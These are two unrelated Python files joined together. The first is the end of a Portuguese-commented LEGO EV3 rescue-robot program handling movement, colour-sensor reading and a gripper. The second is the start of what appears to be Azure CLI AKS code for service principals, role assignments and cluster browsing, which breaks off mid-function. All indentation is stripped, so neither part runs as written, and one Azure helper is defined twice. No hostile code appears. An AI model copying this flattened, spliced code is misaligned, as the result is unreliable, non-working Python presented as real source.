print("Declarando tudo!", end=' \r')
#FUNÇÔES DE LOCOMOÇÂO
def retorno():#função para o retorno
global tentativa,c,cor_atual,velocidade
while c!=cor_atual:
rodas.on(SpeedPercent(velocidade),SpeedPercent(velocidade))
if c!= 'White': Confirmar_cor(c)
#tempo para a parada no meio do quadrado
rodas.on_for_seconds(SpeedPercent(velocidade), SpeedPercent(velocidade), 8/SpeedPercent(velocidade))
rodas.off()
tentativa+=1#indica que foi feita uma tentativa que falhou
procurar_proximo()#vira conforme as orientações que são possiveis
alinha(0.02,230,30)#anda um pouco a frente para nao o robo não reconhecer o mesmo ponto de referencia como um novo ponto
def alinha(Kp,target,margem):
global d
erroE=1
erroD=1
if c == 'White':
while c=='White':
rodas.on(15,15)
rodas.off()
else:
while c!='White':
rodas.on(-15,-15)
rodas.off()
while(erroE != 0 or erroD != 0) :
atualD = d[0]+d[1]+d[2]
erroD=atualD - target
if abs(erroD)<margem:
erroD=0
outputD = erroD* (Kp+0.01)
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
erroE=atualE - target
if abs(erroE)<margem:
erroE=0
outputE = erroE* Kp
if outputE>40:
outputE = 40
elif outputE<-40:
outputE=-40
if outputD>40:
outputD = 40
if erroE == 0 and erroD == 0:
rodas.off()
else:
rodas.on(outputE,outputD)
while c!='White':
rodas.on(-20,-20)
time.sleep(0.3)
rodas.off()
def andar_frente():#Corrigir todos os tempos presentes aqui a fim de utilizar com o robo e pista finais
global cor_atual,tentativa,quads,c,plaza,memoria_cor
#Vai para frente até ver Black, retorna o tempo percorrido
while 1:
if(c=="Black"):
rodas.off()
retorno()
return
elif c!="White" and c!="Black":
if(Confirmar_cor(c)):
verificar_plaza()
if(len(quads)>0 and plaza==False):memoria_cor[cor_atual]=orientacao
if(plaza==False):quads.append(c)
cor_atual=c
print('ACHEI: ',cor_atual)
tentativa=0
rodas.off()
procurar_proximo()
alinha(0.02,230,30)
return
while c=='White':
#Anda pelo branco em procura do boneco se a mochila nao esta carregada(mochila==0).Senão apenas anda para frente no branco
procurar_passageiro()
def virar(graus):#função de virada relativa a posiçao
if graus<0:
rodas.on_for_rotations(-40,40,abs(graus)*(0.666/90))
elif(graus==0): pass
else:
rodas.on_for_rotations(40,-40,abs(graus)*(0.666/90))#FROM HELL
def procurar_proximo():#função de virar conforme o aprendido, ou a falta dele
global tentativa,cor_atual,orientacao
if (cor_atual not in memoria_cor.keys()):
if (90 not in memoria_cor.values() and tentativa == 0):
virar(90)
orientacao = 90
if(90 in memoria_cor.values()):
tentativa=1
if (0 not in memoria_cor.values() and tentativa == 1):
virar(-90)
orientacao = 0
if(0 in memoria_cor.values() and tentativa==1):
tentativa = 2
#if(90 not in memoria_cor.values()):
# virar(-90)
if (-90 not in memoria_cor.values() and tentativa == 2):
if(90 not in memoria_cor.values() and 0 in memoria_cor.values()):
virar(-90)
virar(-90)
else:virar(-90)
orientacao = -90
else:virar(memoria_cor[cor_atual])
#FIM DAS FUNÇÔES DE LOCOMOÇÂO
#FUNÇÕES DE COR
def media(leitura1, leitura2): # FAZ A MÈDIA DAS LEITURAS DOS AMBOS SENSORES
media = []
for x in range(3):
media.append((leitura1[x]+leitura2[x])/2)
return tuple(media)
def cor_mais_proxima(leitura):
global cores
min = 1000
for valor in cores.values():
# DISTANCIA EUCLIDIANA DO VALOR DA LEITURA DO SENSOR QUE FOI USADO COMO ENTRADA COM OS VALORES DAS CORES CALIBRADAS PREVIAMENTE
dist = sqrt(((leitura[0]-valor[0])**2) +
((leitura[1]-valor[1])**2)+((leitura[2]-valor[2])**2))
if(dist < min): # verifica se é menor que o ultimo verificado
min = dist
for key, value in cores.items(): # pega o nome da cor que gerou a menor distancia
if value == valor:
cor = key
return cor
def diferente_de(*cor):
global c
if c not in cor:
return 1
else: return 0
def cor_th():
global c,d
while(1):
c=cor_mais_proxima(Sensor_direita.rgb)
d=Sensor_direita.rgb
# if(c=='Black' and plaza ==False):rodas.off()
def Confirmar_cor(cor_vista):
global c
time.sleep(0.1)
if(c==cor_vista):return True
else:return False
#FIM DAS FUNÇÕES DE COR
#FUNÇÕES DO PLAZA
def verificar_plaza():
global c, mochila, quad, cor_atual, plaza,velocidade
if(1):
if c!='Black':
mudanca = 0
cor_momento = c
goiaba = Thread(target=rodas.on_for_seconds, args=(-15, -15, 32.22/15,))
goiaba.start()
while(goiaba.is_alive()):
print("Checando plaza: ",mudanca)
if (cor_momento != c):
mudanca += 1
cor_momento = c
if(mudanca >= 2):
print("PLAZA")
pickle.dump(memoria_cor,open('memoria.p','wb'))#Armazena os valores aprendidos para debugs futuros
plaza=True #Plaza encontrado
quads.append(quad(cor_atual))#coloca o ultimo quadrado antes do plaza no array
tempo=time.time()
while(c!='Black'):
rodas.on(-(SpeedPercent(velocidade)*1.35), -(SpeedPercent(velocidade)*1.35))
if(diferente_de('Black','White')):
if(Confirmar_cor(c)):
rodas.off()
return
if(plaza==True):
rodas.off()
time.sleep(49.5/SpeedPercent(velocidade))
par=mochila
solte()#deixa o BONECO
mochila=False
rodas.on_for_seconds((SpeedPercent(velocidade)*1.35), (SpeedPercent(velocidade)*1.35), time.time()-tempo)
while(c=="White"):rodas.on(SpeedPercent(velocidade),SpeedPercent(velocidade))
rodas.on_for_seconds(SpeedPercent(velocidade), SpeedPercent(velocidade), 8/SpeedPercent(velocidade))
rodas.off()
if par==True:Mochila_sobe()
virar(180)
Volta()
else:pass
goiaba.join()
rodas.off()
def Volta():
global quads,mochila,start_time,c,velocidade
i=4#Indice para o robo ir somente até o ultimo quadrado -1
#COLOCA O VALOR DE i COM O NUMEROS DE QUADRADOS COLORIDOS NA PISTA
while(i>0 and mochila==False):#Se quiser que o robo vá até o ultimo: Tire a condição da mochila
if c!='White':
print(memoria_cor[c])
virar((memoria_cor[c])*(-1))
alinha(0.02,230,30)
procurar_passageiro()
time.sleep(35.22/SpeedPercent(velocidade))
rodas.off()
if(mochila==True ):
virar(90)
virar(90)
alinha(0.02,230,30)
while(c!='White'):rodas.on(-SpeedPercent(velocidade),-SpeedPercent(velocidade))
rodas.off()
return
i-=1
#if sensor detectar algo retorna start_time e execute a função de pegar o boneco
if(i==0):
virar(90)
virar(90)
while(c!='White'):rodas.on(-SpeedPercent(velocidade),-SpeedPercent(velocidade))
rodas.off()
procurar_passageiro()
verificar_plaza()
#FIM DAS FUNÇÕES DO PLAZA
#FUNÇÕES DA MOCHILA(EQUIPAMENTO DE CAPTURAR BONECO)
def procurar_passageiro():
global mochila,c,velocidade
while c == 'White':
rodas.on(-SpeedPercent(velocidade), -SpeedPercent(velocidade))
if Sensor_sonic.distance_centimeters<15 and mochila==0 :
rodas.off()
pega()
def Mochila_desce():
Mochila.on_for_rotations(SpeedPercent(20), 0.53) ## negativo sobe
def Mochila_solta():
Mochila.on_for_rotations(SpeedPercent(20),0.25)
def Mochila_pega():
Mochila.on_for_rotations(SpeedPercent(-20), 0.25)
def Mochila_sobe():
Mochila.on_for_rotations(SpeedPercent(-20), 0.53)
def solte():
global mochila
rodas.off()
if(mochila==True):
Mochila_solta()
def pega():
global mochila
dist = Sensor_sonic.distance_centimeters
time.sleep(0.5)
rodas.off()
Mochila_desce()
virar(90)
time.sleep(1)
rodas.on_for_seconds(-20,-20,dist*0.05)#regular o valor de forma ao robo pegar o boneco
Mochila_pega()
time.sleep(1)
mochila=True
rodas.on_for_seconds(20,20,dist*0.05)
virar(-90)
rodas.off()
#FIM DAS FUNÇÕES DE MOCHILA
#FUNÇÕES DE INFORMAÇÃO
class quad:#objeto que guarda informações do ponto de referencia encontrado
def __init__(self,cor):
self.cor = cor
#FIM DAS FUNÇÕES DE INFORMAÇÃO
print("Vamos comecar!", end=' \r')
if __name__=="__main__":
start_time=0
plaza = False
ver_cor = Thread(target=cor_th)
ver_cor.daemon=True
ver_cor.start()
time.sleep(0.5)
Mochila_sobe()
while (1):
andar_frente()
|
custom.py | # pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import ManualInterrupt, InvalidArgumentValueError, UnclassifiedUserFault, CLIInternalError, FileOperationError, ClientRequestError, DeploymentError, ValidationError, ArgumentUsageError, MutuallyExclusiveArgumentError, RequiredArgumentMissingError, ResourceNotFoundError
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import get_file_json, in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core._profile import Profile
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2021_07_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedServiceIdentityUserAssignedIdentitiesValue,
ManagedClusterAutoUpgradeProfile,
KubeletConfig,
LinuxOSConfig,
ManagedClusterHTTPProxyConfig,
SysctlConfig,
ManagedClusterPodIdentityProfile,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
UserAssignedIdentity)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_MONITORING_USING_AAD_MSI_AUTH
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, CONST_SECRET_ROTATION_ENABLED
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
from ._consts import ADDONS
from .maintenanceconfiguration import aks_maintenanceconfiguration_update_internal
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM, CONST_PRIVATE_DNS_ZONE_NONE
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
else:
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
# XXX: if role is uuid, this function's output cannot be used as role assignment defintion id
# ref: https://github.com/Azure/azure-cli/issues/2458
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(
cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).principal_id
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements,too-many-branches
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
